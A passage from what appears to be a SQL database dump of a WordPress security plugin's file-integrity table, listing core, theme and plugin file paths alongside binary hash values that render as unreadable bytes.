�%���','��-�Bd/�`��\\V�x6Y*��-$����W','',0,'?'),('�\"u@��T��S��5�','wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�7�\0��tt��.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','an�$�6�����\"','�tɢ�����C-?�\'(�uꢦA�T-1ba��:','',0,'?'),('�8����R�6>G\"���','wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pO�E����6�wR%v','�h�4[��0��7-��\\{�e��$.(.���o�','',0,'?'),('�;����N�Q>���','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��vwX\n_Yg!��','r;�\Z� G�����[i$�)���v�]j7�im#','',0,'?'),('�Y$\'����o���','wp-includes/css/wp-auth-check-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�u��C~7\n���W�e�','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�we�J�����@�?��','�W�ľ�6���7#`_�g�;���,9�.��=','',0,'?'),('ȁ��#/�\0��6','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��ӹu�;P�','�aD�,�ǭ��+v�Fe\"+���!���1t','',0,'?'),('ȍP�� �3����\n��','wp-includes/class-wp-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(���H�g1k!~','Գh(��m7B��.�oǏu��ʼ%a��1ʾ�','',0,'?'),('ȣJ������sm���','wp-content/themes/magazine-hoot/hybrid/ext/breadcrumb-trail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�W�������6','磒B�ϗ_?���piH����֢{���','',0,'?'),('ȣ�gӰ�DZCs��','wp-content/plugins/wp-cerber/assets/flags/cs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qȥ�`�����','���3�#�xUN�^�[ ^�1�a�֌�GX9PP','',0,'?'),('ȫ#����R��F�','wp-content/themes/magazine-hoot/include/attr-schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M/�6�q\'��t���','\r����:\"7�n�\'1O�I�Jg&�\'k8#','',0,'?'),('ȿ�-��`�u���o��','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�m;S��V#��m�I','�R9F��������47i}�ʧ��C^�%','',0,'?'),('�����~\r\ZK4(#��','wp-admin/user/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(팋�#��A���;�','�u�A���+I/�㊓\0�n�N�1G8�\ZD-�','',0,'?'),('�!�`�L�i\0Ը�u','wp-content/plugins/wp-cerber/assets/flags/mf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�5�iD�hI�6�;','wp-includes/SimplePie/Cache/Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�7ŭ����OE6','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�tg��q�O1�0�','�Džg�L���)�Q�r���ty�jX��O�\n�&	�','',0,'?'),('�A7�\'�C#�w�S�s�','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x ��\0�\Z�*m7v%',']jH��#���?�����j6MI�aҰ�(e��','',0,'?'),('�lX�w��B�*X�W�','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ��*�X���9e','�v�\Z�|5.YX ������Z�鹁Ź','',0,'?'),('Ɇ8���pŻѵV�','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pnӑ,vP*�`4i','��)ed}&�C�\"_ڸ�l<z�U�,?b:��@u','',0,'?'),('ɡʧ~����.)k','wp-admin/includes/class-custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_%��5�ߔrg[\Z�','��3�4�n�8�@�}���!��pc�8�\0�̴','',0,'?'),('���l���Q�[��1','wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�����y���\"�Ys','3�2�/ι��Dp�nXe\0uQ\nO#��G','',0,'?'),('�����2D�i�e�','wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĸ�P)�|��q�r���','wppS���\"�D�.��o�MO�m�O�\'b�aNj0','',0,'?'),('�ͤ� �T���-�','wp-content/plugins/wp-cerber/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=v����]���V','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�(�q�4P�}�5Oz�k','wp-admin/js/inline-edit-tax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƶ���s�[��\"�','�]:\r+�����ʩ\'X�bҸX�����LU�','',0,'?'),('�R���ш�޿�0','wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\0���M���\"�\\\\�','9\\�P�;P�;p�%/���?����]z]C�ǐ��','',0,'?'),('�hFM<@`%q-��','wp-admin/includes/class-wp-filesystem-direct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�,k�=G�c�x�','C������	�9�1�@���*C���Z','',0,'?'),('�r��{�\Zk��\"��k','wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�9��yu�S�,�,�k','�	�m���������BFX&I�[s��','',0,'?'),('�xjP����!c�x','wp-admin/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�*���#��_��ҳZ�','�����f��uG#����\'��_ً�:�F�A','',0,'?'),('ʂ[	&�?p�bD','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��MA�@����|�','u��\Z�Ӛ1!�b�� \"�0SBȓ>�rEk�','',0,'?'),('ʵs��	����R>��?','wp-content/themes/twentytwentyone/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G:��Ll�}\0!��%','mDTZ��\r�τ(c�zG�ܟKl�@����Kv','',0,'?'),('���W�>�ҟ����[','wp-includes/Requests/Exception/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���Rlr��','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('��&�����~sXm','wp-content/themes/twentytwenty/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Kp@/ya3ˡ�ZіO','��1�*C�4é�GNÈOA�p1v7.�wV%��2F','',0,'?'),('�܆R(�\'2Whp���G','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏH��C�5̨[\0��','�X��f:�M�t�˃#��sD�4(�NG�F�','',0,'?'),('��	b���8�[����y','wp-includes/js/wp-emoji-release.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d͢7@$��g�;','F\r�R7��s\"YX^�ȹ�$�y�ss[','',0,'?'),('�㱛��� V9�{��b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�+���l�@�h�','3�i]m���&�	��s֯�I��g�e�ok��/M�','',0,'?'),('��O忯uR��c�[j','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[cl�r�u�	�Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('�!��#��I|���F�','wp-includes/js/tinymce/plugins/directionality/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�\"�X	& )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('�5V�x�,$�>7d�k�','wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('�6�<��C�﮿�V:(r','wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�be& W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('�?2��}+�HzB#k','wp-content/themes/magazine-hoot/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ü�� …��>��׉',':#d���\n3l�\r��b@}�QD�a���m�A6�','',0,'?'),('�R���<%��݌�D-�','wp-content/plugins/wp-cerber/assets/flags/co.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@]�\"^��K0��eu>','=Ө�Ĺ^ٜn�_?���*`������s�<�;2','',0,'?'),('�U<�?Y,����ػ(','wp-admin/js/svg-painter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�z4E�=��I)','-&}�)j�ZS�̻e��Ҥ����\'�Z?P�f','',0,'?'),('�U��}�B��	Js��','wp-includes/class-wp-object-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n̩$�������/V','���O�\Zm7l���W���2��m�_/2��$�','',0,'?'),('�y�6�6l�M�C�','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pc�\r���	�\"��','~u~01���8c�8�ɹ��F��E��1=���','',0,'?'),('�|G��$���k���','wp-includes/js/dist/vendor/wp-polyfill-url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J�	���ST�_','',0,'?'),('�}Ua&gl��i�)���!','wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\r�\Z�Y�ܵm`���','~G��s��Mp�����^I�\0~\n)g�<��%��','',0,'?'),('ˍ�G䯀oe���o�','wp-includes/js/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('ˤԐ�{%k�#�f�','wp-includes/js/mediaelement/wp-playlist.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('�ǝ��Q��_y�d��+�','wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('���N��\0��ܹ�t','wp-includes/js/jquery/ui/spinner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8��TXi�M�Y�','�>�qJط���0� �\'���R\'n�7s�b3|','',0,'?'),('�����k2�nŒ���','wp-content/plugins/wp-cerber/cerber-scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J�L�[�q?���_','o�a��il2V*�B�h_|��{���l��\r��','',0,'?'),('��v�E,�-O�{���','wp-includes/link-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Kn~�?��ӂ~d�','�,�P��en��y����\\A�8����2��','',0,'?'),('����{�@�q��mu','wp-content/themes/twentytwentyone/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��E�50Q��D=�l�','�2&���.����(SG�l���^�N��C&/ρ�','',0,'?'),('�!�LT�3��i��x�','wp-admin/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�VgN�7��?:^�','�Z*\n���&z9f?�\"k�>tg','',0,'?'),('�4GOE��2;|��Vw�C','wp-content/themes/magazine-hoot/include/menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T!�J�|M\\[���','��y�l�K�X��_:S���ݖ�,��m�\Z','',0,'?'),('�M�Tq&[?��>칊�\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�9+�\"��+��','B��m��N��h�����stN��jAS4X\0$','',0,'?'),('�M����z�ŭY���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�Vd	]�=M[[ٿ���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�nr�\'U���o{��','�BS�?jP����0h~q��G�^K�ew�vO','',0,'?'),('�V�ڮ����M��jӁ','wp-includes/js/plupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('���i��n�j/�r��','wp-includes/js/dist/i18n.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pMp�s�Rӷ_�_','+��d8/�]��jB���2?��q�����N','',0,'?'),('́ԑ�A�Ha]�\':�','wp-includes/blocks/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�Dn>�u�6j\r','7#�x>֜�bo�R�4#;�ۤ��|	J��','',0,'?'),('̋��q�B3a�Y��-�','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0`\'}�(���b���A#','c,�Bp�2�8���0j��7}hp-��宆','',0,'?'),('̔���E�xk~u���','wp-content/themes/magazine-hoot/widget/posts-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y��v�/��5�T','\Z�u��{�9U�L\n���~��y�|��]�9','',0,'?'),('̙~�Ȍî+���byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�숊z��;5!��','�D�\Z���L�ޠΔa��]n�\n���L&�\n','',0,'?'),('̝z\'Q�e�@�N��A','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/8.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?ƮE���<�w(�','��|(m����ʼnF��}CJl�-2��ȳ&��J','',0,'?'),('̽� ���X�$oB�','wp-content/plugins/akismet/_inc/akismet.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z>(9��\"r�4\"��','v&�`���^�؂i��Af��Eg|!$~�Iu�2�','',0,'?'),('�Ê5ff�;,G!\'��\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�����Wz�EY�','�����Q�M��d�� ���XټT%�c�','',0,'?'),('�����\";+�\rxu���w','wp-includes/js/mediaelement/renderers/vimeo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('�NJ�E�v�c,�صyS^','wp-includes/images/crystal/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('����p�j֛`��w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�y-�uv�	O�C','����\0���˝`&�q�G%\Zh�����,#�','',0,'?'),('�n	�}V-����I�','wp-content/themes/twentytwenty/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�P�2��%F��,�-','�ʄ�%��Ũ�k$ Ȏ������g?��Ҧ�','',0,'?'),('�d���lP�O�I�','wp-admin/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DlR����=���@n','ٔ�fİ��	�qRK/�h��XٱVJH&k�HPB','',0,'?'),('�)����\0�e�_�5=�','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�Q ����f��7�F','�Ҏ��E����؊>^!j��\0O���ca��^��','',0,'?'),('�K=�X�a:�\'5�','wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),('�^&��`R�y����J','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}n�3;g)���','\nj�^�����C�(��UU�i\'9�O','',0,'?'),('�m��L0N\"�T~�b�','wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%���	^#','',0,'?'),('�w�9=�_\"h%��v','wp-admin/css/install-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\'�K��5oi�J�','�C�C���V��c��x�\"a�8q�vu\Za�','',0,'?'),('͓�Y�36��l�Y��','wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('ͤ8B���¸]��E|','wp-content/plugins/wp-cerber/assets/flags/ky.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M� �d�pV�,�d�','��QP�8�TG�{jrNK�-��,�/l�j	��','',0,'?'),('ͪu�owsFC�G[c��','wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�Co�;�,.!O^�>','Otu��%~�x�ʱ��o��ӗJ���4��%�','',0,'?'),('Ͷ�jʃఱ���-�','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:د_x��O0�8���X','�[�|�r�;�������Ƹ����l�b���	Q','',0,'?'),('ͽ3��=��O�G�|~�','wp-includes/SimplePie/Credit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�6�K>.��L��','r�ٴ��@c�@���{R�CG����d^�>>E\Z','',0,'?'),('�ϘFvD�̫H�','wp-content/plugins/wp-cerber/assets/flags/tg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f/f�|f~�8','=JUV�1H���kE����OZ�oD\\��׭','',0,'?'),('��3�����F�<��8','wp-includes/js/underscore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����$b��Z�C','�8A�2�xz��\0<G-�E	��r��쇮?�R�','',0,'?'),('��S�>s�U)����H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('��y�!Ϭ���T��','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/4b.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���p�L��݂=9�','�	,�+8A�9܍8d#z(\r\"�>p��a}�]�','',0,'?'),('���j(g��~jU#��','wp-admin/includes/class-wp-filesystem-ssh2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�\r�<�\n����-��1','�Am���(�t��w�*lEd�s��@������','',0,'?'),('� ��Mu�)`��>�2','wp-content/themes/twentytwentyone/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~E�Ю��ȕ��9~','��q��?{Q%8��ѣ�=��\'N�4oÒ�s','',0,'?'),('�N: ������@�kς','wp-content/themes/twentytwentyone/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�Ɓ.����o���O#','d�{�_�U��R7I���o�(�~�6,\rT���\n��','',0,'?'),('�Y��f/�pw����','wp-includes/Requests/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p����R櫷�\'G','����WwYKL\n��	-*���^e\"e�(_,g','',0,'?'),('�_)-�]�ˌkO	��','wp-includes/ID3/module.tag.apetag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\)���H�G���>�','ٚ+��\"�Bt���	\'S_��̄E�s��_�)^�','',0,'?'),('�l/<��U��ZA��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Sz�L�HAWr�6~','0��pU���gו�G/���%��\'���Zd�\n\n','',0,'?'),('�|��f�����,2�T	','wp-admin/term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�3&�Е��(6�&�','H�4\0�p�B��a��m�f���SU\n��T','',0,'?'),('ΝP|�ڒ����\\�o','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('α�Z	��i�Iȏ�','wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m3�E�?��՛','0pU��Ĭ���h���C�r+���˞I�{-qA�','',0,'?'),('���+4#�E����Wl�3','wp-content/plugins/wp-cerber/assets/flags/ma.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E3ц�Җ`?n~','�Lx����9�yՌ�6luт�l�Ca�e@���','',0,'?'),('�œ���ϔ�=��#6','wp-admin/images/post-formats32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY~�O��{�+_L�kE;','k�<8�._D��K����G[�5e-I(0w��h','',0,'?'),('��,���@���Q�','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��\"�sg�4�\\(�8','�@��Zn\"ξ~�QՔ��8�s�P���\07�3','',0,'?'),('��$e�&�gq�i�m�','wp-content/themes/twentytwenty/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���L�*��H��u���','~��д\"�\'6���xg�k�?$��u�J{R^','',0,'?'),('�-�+�e���m�u\"��x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ur�\\�٭l_��?�','��.�jflޛ���,&���ĸ�G��Ku�?���','',0,'?'),('�26�6�#	S[h(\\��','wp-includes/css/dist/block-library/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QD�����B+|lH��','������\n(�c�CF���T�)I�� V+�','',0,'?'),('�L�{�����ӟ���','wp-content/themes/magazine-hoot/include/admin/js/about.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����S	���%�','B\\�LI.l�H�H26\0F5��V�`i14I(tE�{�','',0,'?'),('�Q�K���Q95�Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>��Y!\\z��JX','��B*yL˰��a��u�\"t�\Z4��Z۳Nk¥','',0,'?'),('�XC�b�;�f\0;<�','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-���S�H1@�kQұ','��^H2m<��LA��m	N��G�)Iw��:�D','',0,'?'),('�_q ^��<�8��:�	','wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��U�M�\rv4�GP','M$_��f#5�r�풗g��\0��ra���O�m�N','',0,'?'),('�uF��^G��E+��c','wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���6�|��tJ4�1�','��B�;����M�7�߃��[�9�</�','',0,'?'),('π�tGȩ����D','wp-includes/js/tinymce/plugins/image/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('ϊ=��X���bBz\' �','wp-includes/js/jquery/ui/effect-explode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('Ϛ�\"���j�y����^','wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$ج�o8؁)�c����','��\Z\Z���#9�#�H�;yό�:˙���#e','',0,'?'),('�����HԹ��f�k�','wp-includes/js/tinymce/wp-tinymce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('���yKv��.�\Z�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��_�3��Nw�#�','�ǥ��mZz*,=:\n��-�3��|��!���','',0,'?'),('�ݙ�P(���O\'E��e','wp-includes/js/jquery/ui/effect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�b�N���\nk!?','aQ���Qޖ�X�g�P�����;���:@�3�','',0,'?'),('�鋭��{^�MU*�_','wp-includes/js/twemoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޮ��!�P��+!�x�','���Q���ӫ��q��6uN�󗬏','',0,'?'),('��\\T��@SO�|m','wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8}(�iC-.�w','�Pp��6��R���{��PeP�Q\r�k7�_?�','',0,'?'),('�@��AO=	�yA�','wp-includes/class-wp-paused-extensions-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('��]mٲ�	▭�','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w�̩	��&J����)','���M��,�P:�k�\nN�2�[s\nWze]oN','',0,'?'),('�\Z��YÅjxU�#�6�k','wp-content/plugins/wp-cerber/assets/flags/mx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�W6;���%����','E���&8��0�`�����\ZQ3`���w]#�ע','',0,'?'),('�%#��t���4�x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�W�0{X�n�Z�0','�\0AV�RX��ȕ�~��d�^�/)�@R��','',0,'?'),('�4a����I�7=T','wp-content/themes/magazine-hoot/template-parts/sidebar-below-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�Bn�����','ѐ���@f����	�Y�����lx&��\nfӄ','',0,'?'),('�>6bY���AUF�.','wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\nP?^��u:�	','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('�>�s�l�WD7�M�','wp-includes/bookmark-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dZc7��4�JX��','�t��l�P?d���=)��@zi�!��9a�','',0,'?'),('�T޼q%<>z�բ�','wp-content/plugins/wp-cerber/assets/flags/bv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('�a:ֆ3B�g�:�HRd','wp-content/themes/magazine-hoot/include/admin/images/premium-colors.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������TZ�/�%�','\'�(\0xNh�B�	��ir!]\'n!�>����#I!\Z�','',0,'?'),('�d 